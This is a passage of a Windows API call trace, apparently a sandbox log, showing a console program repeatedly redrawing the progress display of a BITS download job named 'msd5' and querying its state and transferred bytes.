[0070.503] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0070.504] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f0 | out: lpConsoleScreenBufferInfo=0x18f0f0) returned 1
[0070.504] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18f108, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f108*=0xa) returned 1
[0070.504] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.505] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0ec | out: lpConsoleScreenBufferInfo=0x18f0ec) returned 1
[0070.505] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x18f104, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f104*=0x5) returned 1
[0070.505] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.505] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f4 | out: lpConsoleScreenBufferInfo=0x18f0f4) returned 1
[0070.505] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x18f10c, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f10c*=0x7) returned 1
[0070.505] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e8 | out: lpConsoleScreenBufferInfo=0x18f0e8) returned 1
[0070.506] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f100, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f100*=0x8) returned 1
[0070.506] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f0 | out: lpConsoleScreenBufferInfo=0x18f0f0) returned 1
[0070.506] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f108, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f108*=0x8) returned 1
[0070.507] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.507] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e4 | out: lpConsoleScreenBufferInfo=0x18f0e4) returned 1
[0070.507] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x18f0fc, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0fc*=0xc) returned 1
[0070.507] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.507] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f4 | out: lpConsoleScreenBufferInfo=0x18f0f4) returned 1
[0070.507] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18f10c, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f10c*=0xa) returned 1
[0070.507] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.508] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0dc | out: lpConsoleScreenBufferInfo=0x18f0dc) returned 1
[0070.508] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18f0f4, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0f4*=0xa) returned 1
[0070.508] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.508] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e4 | out: lpConsoleScreenBufferInfo=0x18f0e4) returned 1
[0070.508] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f0fc, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0fc*=0x8) returned 1
[0070.509] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.509] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f108 | out: _Buffer="0") returned 1
[0070.509] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f114 | out: _Buffer="1") returned 1
[0070.509] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e4 | out: lpConsoleScreenBufferInfo=0x18f0e4) returned 1
[0070.509] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x18f0fc, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0fc*=0x5) returned 1
[0070.509] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.509] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0ec | out: lpConsoleScreenBufferInfo=0x18f0ec) returned 1
[0070.509] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f104, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f104*=0x8) returned 1
[0070.510] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.510] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f110 | out: _Buffer="0") returned 1
[0070.510] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f104 | out: lpSystemTimeAsFileTime=0x18f104*(dwLowDateTime=0xdaa3a890, dwHighDateTime=0x1d469c7))
[0070.510] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f0fc | out: lpSystemTimeAsFileTime=0x18f0fc*(dwLowDateTime=0xdaa3a890, dwHighDateTime=0x1d469c7))
[0070.510] _finite (_X=0x0) returned 0
[0070.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0bc | out: lpConsoleScreenBufferInfo=0x18f0bc) returned 1
[0070.510] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x18f0d4, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0d4*=0xd) returned 1
[0070.510] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.511] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0c8 | out: lpConsoleScreenBufferInfo=0x18f0c8) returned 1
[0070.511] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x18f0e0, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0e0*=0xf) returned 1
[0070.511] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.511] _vsnwprintf (in: _Buffer=0x18eef4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x18eeb8 | out: _Buffer="0.00 B/S") returned 8
[0070.511] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f10c | out: lpConsoleScreenBufferInfo=0x18f10c) returned 1
[0070.511] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f124, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f124*=0x8) returned 1
[0070.512] CoTaskMemFree (pv=0x298390)
[0070.512] PeekMessageW (in: lpMsg=0x18fa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fa80) returned 0
[0070.512] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x18faa8*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0070.666] PeekMessageW (in: lpMsg=0x18fa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fa80) returned 1
[0070.666] TranslateMessage (lpMsg=0x18fa80) returned 0
[0070.666] DispatchMessageW (lpMsg=0x18fa80) returned 0x1
[0070.666] IBackgroundCopyCallback:JobModification (This=0x299238, pJob=0x28a6a4, dwReserved=0x0) returned 0x0
[0070.666] IBackgroundCopyJob:GetState (in: This=0x28a614, pVal=0x299244 | out: pVal=0x299244) returned 0x0
[0070.678] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc0
[0070.678] IBackgroundCopyJob:GetType (in: This=0x28a614, pVal=0x18f148 | out: pVal=0x18f148) returned 0x0
[0070.679] IBackgroundCopyCallback:JobModification (This=0x299238, pJob=0x28a6a4, dwReserved=0x0) returned 0x0
[0070.679] IBackgroundCopyJob:GetState (in: This=0x28a614, pVal=0x299244 | out: pVal=0x299244) returned 0x0
[0070.680] IBackgroundCopyJob:GetProgress (in: This=0x28a614, pVal=0x299248 | out: pVal=0x299248) returned 0x0
[0070.680] IBackgroundCopyJob:GetPriority (in: This=0x28a614, pVal=0x18f144 | out: pVal=0x18f144) returned 0x0
[0070.681] CoTaskMemFree (pv=0x0)
[0070.681] IBackgroundCopyJob:GetDisplayName (in: This=0x28a614, pVal=0x18f15c | out: pVal=0x18f15c*="msd5") returned 0x0
[0070.682] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f104 | out: lpConsoleScreenBufferInfo=0x18f104) returned 1
[0070.682] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x18f11c | out: lpNumberOfCharsWritten=0x18f11c) returned 1
[0070.682] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x18f11c | out: lpNumberOfAttrsWritten=0x18f11c) returned 1
[0070.682] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0070.682] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.683] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f0 | out: lpConsoleScreenBufferInfo=0x18f0f0) returned 1
[0070.683] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18f108, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f108*=0xa) returned 1
[0070.683] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.683] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0ec | out: lpConsoleScreenBufferInfo=0x18f0ec) returned 1
[0070.683] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x18f104, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f104*=0x5) returned 1
[0070.683] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.684] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f4 | out: lpConsoleScreenBufferInfo=0x18f0f4) returned 1
[0070.684] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x18f10c, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f10c*=0x7) returned 1
[0070.684] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.684] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e8 | out: lpConsoleScreenBufferInfo=0x18f0e8) returned 1
[0070.684] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f100, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f100*=0x8) returned 1
[0070.684] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.685] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f0 | out: lpConsoleScreenBufferInfo=0x18f0f0) returned 1
[0070.685] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f108, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f108*=0x8) returned 1
[0070.685] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.685] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e4 | out: lpConsoleScreenBufferInfo=0x18f0e4) returned 1
[0070.685] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x18f0fc, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0fc*=0xc) returned 1
[0070.686] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.686] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f4 | out: lpConsoleScreenBufferInfo=0x18f0f4) returned 1
[0070.686] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18f10c, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f10c*=0xa) returned 1
[0070.686] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.686] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0dc | out: lpConsoleScreenBufferInfo=0x18f0dc) returned 1
[0070.686] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18f0f4, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0f4*=0xa) returned 1
[0070.687] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.687] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e4 | out: lpConsoleScreenBufferInfo=0x18f0e4) returned 1
[0070.687] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f0fc, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0fc*=0x8) returned 1
[0070.687] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.687] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f108 | out: _Buffer="0") returned 1
[0070.687] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f114 | out: _Buffer="1") returned 1
[0070.687] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e4 | out: lpConsoleScreenBufferInfo=0x18f0e4) returned 1
[0070.688] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x18f0fc, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0fc*=0x5) returned 1
[0070.688] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.688] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0ec | out: lpConsoleScreenBufferInfo=0x18f0ec) returned 1
[0070.688] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f104, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f104*=0x8) returned 1
[0070.688] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.688] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f110 | out: _Buffer="0") returned 1
[0070.688] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f114 | out: _Buffer="1097216") returned 7
[0070.689] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f110 | out: _Buffer="0") returned 1
[0070.689] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f0fc | out: lpSystemTimeAsFileTime=0x18f0fc*(dwLowDateTime=0xdabdd7b0, dwHighDateTime=0x1d469c7))
[0070.689] _finite (_X=0x0) returned 1
[0070.689] _finite (_X=0x0) returned 1
[0070.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0bc | out: lpConsoleScreenBufferInfo=0x18f0bc) returned 1
[0070.689] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x12, lpNumberOfCharsWritten=0x18f0d4, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0d4*=0x12) returned 1
[0070.689] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0c8 | out: lpConsoleScreenBufferInfo=0x18f0c8) returned 1
[0070.689] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x18f0e0, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0e0*=0xf) returned 1
[0070.690] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.690] _vsnwprintf (in: _Buffer=0x18eef4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x18eeb8 | out: _Buffer="0.00 B/S") returned 8
[0070.690] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f10c | out: lpConsoleScreenBufferInfo=0x18f10c) returned 1
[0070.690] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f124, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f124*=0x8) returned 1
[0070.690] CoTaskMemFree (pv=0x2983e0)
[0070.691] PeekMessageW (in: lpMsg=0x18fa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fa80) returned 0
[0070.691] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x18faa8*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0071.086] PeekMessageW (in: lpMsg=0x18fa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fa80) returned 1
[0071.086] TranslateMessage (lpMsg=0x18fa80) returned 0
[0071.086] DispatchMessageW (lpMsg=0x18fa80) returned 0x1
[0071.087] IBackgroundCopyCallback:JobModification (This=0x299238, pJob=0x28a6a4, dwReserved=0x0) returned 0x0
[0071.087] IBackgroundCopyJob:GetState (in: This=0x28a614, pVal=0x299244 | out: pVal=0x299244) returned 0x0
[0071.087] KillTimer (hWnd=0x0, uIDEvent=0x7fc0) returned 1
[0071.087] IBackgroundCopyJob:GetType (in: This=0x28a614, pVal=0x18f148 | out: pVal=0x18f148) returned 0x0
[0071.088] IBackgroundCopyJob:GetProgress (in: This=0x28a614, pVal=0x299248 | out: pVal=0x299248) returned 0x0
[0071.089] IBackgroundCopyJob:GetPriority (in: This=0x28a614, pVal=0x18f144 | out: pVal=0x18f144) returned 0x0
[0071.090] CoTaskMemFree (pv=0x0)
[0071.090] IBackgroundCopyJob:GetDisplayName (in: This=0x28a614, pVal=0x18f15c | out: pVal=0x18f15c*="msd5") returned 0x0
[0071.091] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f104 | out: lpConsoleScreenBufferInfo=0x18f104) returned 1
[0071.091] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x18f11c | out: lpNumberOfCharsWritten=0x18f11c) returned 1
[0071.091] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x18f11c | out: lpNumberOfAttrsWritten=0x18f11c) returned 1
[0071.091] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0071.092] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.092] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f0 | out: lpConsoleScreenBufferInfo=0x18f0f0) returned 1
[0071.092] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18f108, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f108*=0xa) returned 1
[0071.092] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.093] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0ec | out: lpConsoleScreenBufferInfo=0x18f0ec) returned 1
[0071.093] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x18f104, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f104*=0x5) returned 1
[0071.093] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.093] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f4 | out: lpConsoleScreenBufferInfo=0x18f0f4) returned 1
[0071.093] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x18f10c, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f10c*=0x7) returned 1
[0071.094] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.094] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e8 | out: lpConsoleScreenBufferInfo=0x18f0e8) returned 1
[0071.094] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f100, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f100*=0x8) returned 1
[0071.094] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.095] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f0 | out: lpConsoleScreenBufferInfo=0x18f0f0) returned 1
[0071.095] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f108, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f108*=0x8) returned 1
[0071.095] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.095] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e4 | out: lpConsoleScreenBufferInfo=0x18f0e4) returned 1
[0071.095] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x18f0fc, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0fc*=0xe) returned 1
[0071.096] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0f4 | out: lpConsoleScreenBufferInfo=0x18f0f4) returned 1
[0071.096] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18f10c, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f10c*=0xa) returned 1
[0071.096] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0dc | out: lpConsoleScreenBufferInfo=0x18f0dc) returned 1
[0071.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18f0f4, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0f4*=0xa) returned 1
[0071.097] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e4 | out: lpConsoleScreenBufferInfo=0x18f0e4) returned 1
[0071.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f0fc, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0fc*=0x8) returned 1
[0071.098] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.098] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f108 | out: _Buffer="0") returned 1
[0071.098] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f114 | out: _Buffer="1") returned 1
[0071.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0e4 | out: lpConsoleScreenBufferInfo=0x18f0e4) returned 1
[0071.098] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x18f0fc, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0fc*=0x5) returned 1
[0071.099] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0ec | out: lpConsoleScreenBufferInfo=0x18f0ec) returned 1
[0071.099] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18f104, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f104*=0x8) returned 1
